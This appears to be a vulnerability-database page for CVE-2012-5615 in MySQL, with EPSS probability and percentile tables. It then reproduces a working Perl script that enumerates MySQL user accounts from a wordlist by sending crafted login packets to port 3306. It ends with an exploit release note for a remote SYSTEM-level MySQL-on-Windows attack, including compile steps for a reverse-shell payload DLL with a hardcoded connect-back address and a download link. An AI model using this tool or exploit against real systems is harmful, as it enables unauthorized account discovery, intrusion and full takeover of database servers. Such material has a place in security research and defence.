CVE-2012-5615 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	21.83%	–	–
2022-04-03	–	–	21.83%	–	–
2022-05-08	–	–	20.33%	–	–
2022-08-14	–	–	19.17%	–	–
2022-11-20	–	–	18.31%	–	–
2023-02-19	–	–	17.79%	–	–
2023-03-12	–	–	–	10.89%	–
2023-06-25	–	–	–	8.88%	–
2023-12-31	–	–	–	7.92%	–
2024-03-03	–	–	–	6.46%	–
2024-06-02	–	–	–	6.46%	–
2024-07-07	–	–	–	6.2%	–
2024-11-03	–	–	–	5.75%	–
2024-12-22	–	–	–	5.75%	–
2025-01-19	–	–	–	5.75%	–
2025-03-18	–	–	–	–	20.87%
2025-04-06	–	–	–	–	19.22%
2025-04-06	–	–	–	–	19.22,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	94%
2022-04-03	96%
2022-05-08	96%
2022-08-14	96%
2022-11-20	96%
2023-02-19	96%
2023-03-12	94%
2023-06-25	94%
2023-12-31	94%
2024-03-03	94%
2024-06-02	94%
2024-07-07	94%
2024-11-03	94%
2024-12-22	93%
2025-01-19	93%
2025-03-18	95%
2025-04-06	95%
2025-04-06	95%

# MySQL User Account Enumeration Utility # When an attacker authenticates using an incorrect password # with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server # the mysql server will respond with a different message than Access Denied, what makes # User Account Enumeration possible. # The Downside is that the attacker has to reconnect for each user enumeration attempt #20000 user accounts in 7 minutes #Mon Jan 16 09:00:18 UTC 2012 #Mon Jan 16 09:07:26 UTC 2012 #root@vs2067037:~# wc -l MEDIUM.LST #21109 MEDIUM.LST #A usernames.txt wordlist is included in this package #examples: #root@vs2067037:~# perl mysqlenum.pl host usernames.txt # #[*] HIT! -- USER EXISTS: administrator@host # #root@vs2067037:~# perl mysqlenum.pl host usernames.txt # #[*] HIT! -- USER EXISTS: admin@host # use IO::Socket; use Parallel::ForkManager; $|=1; if ($#ARGV != 1) { print "Usage: mysqlenumerate.pl <target> <wordlist>\n"; exit; } $target = $ARGV[0]; $wordlist = $ARGV[1]; $numforks = 50; $pm = new Parallel::ForkManager($numforks); open FILE,"<$wordlist"; unlink '/tmp/cracked'; @users = (); $k=0; while(<FILE>) { chomp; $_ =~ s/\r//g; $users[$k++] = $_; } close FILE; $k2 = 0; for(;;) { for ($k=0;$k<$numforks;$k++) { $k2++; if (($k2 > $#users) or (-e '/tmp/cracked')) { exit; } my $pid = $pm->start and next; $user = $users[$k2]; goto further; again: print "Connect Error\n"; further: my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '3306', Proto => 'tcp') || goto again; recv($sock, $buff, 1024, 0); $buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50". "\x4e\x5f\x51\x55\x45\x4d\x45\x00"; $buf = chr(length($buf)-3). $buf; print $sock $buf; $res = recv($sock, $buff, 1024, 0); close($sock); if ($k2 % 100 == 0) { print $buff."\n"; } if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;} unless (-e '/tmp/cracked') { open FILE, ">/tmp/cracked"; close FILE; print "\n[*] HIT! -- USER EXISTS: $user\@$target\n"; open FILE, ">jackpot"; print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n"; exit; } } $pm->wait_all_children; }

*** FARLiGHT ELiTE HACKERS LEGACY R3L3ASE *** Attached is the MySQL Windows Remote Exploit (post-auth, udf technique) including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org. Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday All owned By Kingcope https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23073.tar.gz Installation Instructions ============================= 1. Install mysql client libraries and headers (UNIX) RedHat based (e.g. CentOS): yum install mysql mysql-devel 2. Compile the standalone exploit issue commands: gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient 3. Compile the reverse shell payload (this is required!) required because the connect back ip and port are hardcoded in the dll: use mingw on windows or wine change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have to change the port in mysqljackpot.c too (default port: 443). issue commands: set PATH=%PATH%;c:\MinGW\bin\ gcc -c payload.c gcc -shared -o payload.dll payload.o -lws2_32 copy the payload.dll into the mysqljackpot exploit folder 4. Run The Exploit ./mysqljackpot -u root -p "" -t 99.99.99.99 A valid database admin user and his password are required for the exploit to work properly. This exploit is especially useful when used in connection to a MySQL login scanner, see scanner/README.mysql inside this package. Be sure to have the firewall open on the desired reverse port on the attacking machine. 5. Enjoy your SYSTEM Shell!!! Yours Sincerely, -- Kingcope